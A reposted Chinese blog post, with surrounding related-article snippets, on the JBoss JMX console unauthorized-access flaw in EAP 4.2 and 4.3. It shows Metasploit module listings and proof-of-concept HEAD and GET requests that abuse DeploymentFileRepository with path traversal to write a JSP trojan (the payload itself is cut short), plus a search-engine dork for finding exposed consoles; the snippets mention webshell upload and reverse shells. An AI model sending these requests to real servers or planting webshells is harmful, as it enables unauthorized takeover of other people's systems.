jboss非授权访问漏洞

最新推荐文章于 2024-05-12 08:00:00 发布
最新推荐文章于 2024-05-12 08:00:00 发布
阅读量488 收藏
点赞数
文章标签: java
原文链接:https://yq.aliyun.com/articles/436825
版权

jboss漏洞参考:http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html

具体影响:

RedHat JBoss EAP 4.3
RedHat JBoss EAP 4.2

JBoss企业应用平台(EAP)是J2EE应用的中间件平台。 JMX控制台配置仅对使用GET和POST HTTP命令的请求指定了认证要求,远程攻击者可以创建没有指定GET或POST的HTTP请求以admin身份进行操作。其实在 RHSA-2008:0828更新修复了未经认证用户可访问状态servlet的漏洞(CVE-2008-3273);但RHSA-2009:0349中 的bug修复重新引入了这个漏洞。在metasploit中已经看到更新了这个漏洞插件:

msf > search jboss
[*] Searching loaded modules for pattern ‘jboss’…

Exploits
========

Name Rank Description
—- —- ———–
multi/http/jboss_deploymentfilerepository excellent JBoss Java Class DeploymentFileRepository Directory Traversal

multi/http/jboss_maindeployer excellent JBoss JMX Console Deployer Upload and Execute
…………

poc:

HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*……. HTTP/1.1

用baidu“inurl:jmx-console”,发现用4.2、4.3版本的不少,可惜主要是windows平台为主。

这里还可以延伸一个小技巧,虽然有些jboss没有密码,但不允许远程发布文件,我们可以用以下解决:

GET /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*……. (木马代码) HTTP/1.1

这也是jboss autopwn里的方法。当然metasploit也实现了这点。


















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/422584,如需转载请自行联系原作者

weixin_34162629
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JBoss安全之jmx-console控制台未授权访问漏洞
Keep learing, and stay fast
11-02 4228
近期工作用到了jmx-console,顺便整理下Jboss的Jmx-console密码访问相关的知识与配置。 MBean就是一种规范的JavaBean,通过集成和实现一套标准的Bean接口,这种叫MBean,Mbean注册到MBeanServer中。之后将被MBeanServer中注册过的Adapter(比如渲染为HTML的HtmlAdapter)渲染为直观的页面将MBean的属性和方法展示给用户。 MBean -> MBeanServer ...
JBoss历史漏洞汇总与复现
m0_48108919的博客
04-02 6685
前言:jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080,9990 一、jboss 代码执行 (CVE-2017-12149) ...
授权访问JBoss授权访问漏洞
最新发布
qq_68163788的博客
05-12 403
JBoss授权访问漏洞是指攻击者可以通过构造特定的请求包,在未经授权的情况下远程执行命令,进而控制服务器。该漏洞主要影响JBoss管理界面,由于默认配置下,JBoss管理界面存在弱口令和默认账户等问题,因此容易被攻击者利用。 攻击者通过向JBoss管理界面发送恶意请求,可以实现对服务器的远程命令执行、文件上传等操作。此外,由于JBoss管理界面存在多个版本,不同版本的漏洞细节也存在差异,因此需要根据具体情况进行修复。
Jboss历史漏洞利用 - JMX Console 未授权访问漏洞
HAKUNAMATATATTA的博客
12-08 2152
Jboss的webUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell
JBOSS授权漏洞总结
m0_64481831的博客
04-03 916
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS授权访问漏洞介绍漏洞原理JBOSS授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
JBoss 中间件漏洞
qq_53742230的博客
07-11 1107
JBoss 中间件漏洞复现
Jboss控制台jmx-console的安全设置
04-22
Jboss控制台jmx-console的安全设置
web安全漏洞加固手册
06-22
授权访问是指攻击者可以通过某些漏洞访问受保护的资源。解决这个问题的方法是对资源进行权限控制,限制访问权限,并且对访问日志进行监控来检测未授权访问。 1.1.6 文件上传漏洞 文件上传漏洞是指攻击者可以...
web应用漏洞.docx
07-05
10. JBoss jmx-console 未授权访问漏洞:攻击者可以通过该漏洞访问授权的资源。 Web 应用漏洞常危险的,攻击者可以通过这些漏洞执行任意代码、获取敏感信息、提升权限等。因此,开发者和管理员必须尽力保护...
JBOSS服务器安全配置基线.docx
09-20
4. 访问控制:对 JBOSS 服务器的访问进行严格的控制,只有授权的用户才能访问访问控制是 JBOSS 服务器安全配置基线的重要组成部分。该控制可以确保只有授权的用户才能访问 JBOSS 服务器,保护服务器的安全。 5....
jboss中间件漏洞复现
mingyqf的博客
02-15 1358
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
JBOSS授权访问漏洞复现学习
0nc3的博客
12-18 1410
0x00 漏洞简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。 默认情况下访问 http://ip:8080/jmx-console 就可以访问管理控制台,不需要输入用户名和密码就可以直接浏览 JBoss 的部署管理的信息,部署上传木马,存在...
JBOSS授权访问
jia3643的博客
09-28 1302
0X01、漏洞描述 jobss 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 fofa找个站,访问 //jmx-console/ 0X02、漏洞复现 思路一 进入 jboss.deployment 部署页面 cs搭建web服务器,上传木马,通过addurl进行远程部署 部署成功后访问 目录文件名,便可进入木马。eg:AAA.war 则访问 /AAA/index.jsp 思路二:直接构造poc /jmx-conso
jboss授权访问漏洞复现
WY92139010的博客
08-02 919
jboss授权访问漏洞复现 一、漏洞描述 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建及复现 1、 这里用CVE-2017-7504的漏洞环境,启动环境 docker-compose up -d 2、 浏览器访问http://172.17.0.1:8080/    ...
jboss授权Getshell
weixin_30488085的博客
06-06 842
一、jboss授权访问Getshell 1.jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 2./jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploym...
【实战】Jboss授权访问(JMX-Console)Getshell
cj_Hydra's Blog
11-05 2480
都是重复造轮子,没啥技术含量,只能说以后遇到了知道怎么操作就行。 GO: 访问地址:http://ip/JMX-Console 找到jboss.deployment 进入页面后找到void addURL() 此时部署我们远程的war木马,部署好了以后点击Invoke http:vpsIP地址/soft/cus.war 随后来到URLList中查看Value值是否已经部署好,并且为我们的远程war木马地址 最后点击Apply Changes 后耐心等待一会儿,然后回到JMX-Console目录中 找到
CVE-2017-12149JBoss 反序列化漏洞利用
weixin_30314631的博客
05-04 483
CVE-2017-12149 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。 影响范围 漏洞影响5.x和6.x版本的JBOSSAS。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应...
jboss反序列化漏洞
08-16
JBoss反序列化漏洞是指JBoss应用服务器中存在的一种安全漏洞,具体表现为Java反序列化错误类型。该漏洞存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致漏洞的出现。攻击者可以利用此漏洞发送特制的请求,通过发送包含恶意序列化数据的POST请求到`/invoker/readonly`路径,实现远程代码执行的攻击。这个漏洞可以在JBoss 5.x和6.x版本中被利用。如果访问`http://ip:端口/jbossmq-httpil/HTTPServerILServlet`出现相关页面,就可能存在该漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jboss反序列化漏洞](https://blog.csdn.net/weixin_48776804/article/details/116919336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [JBOSS反序列化漏洞](https://blog.csdn.net/weixin_52206305/article/details/125534761)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值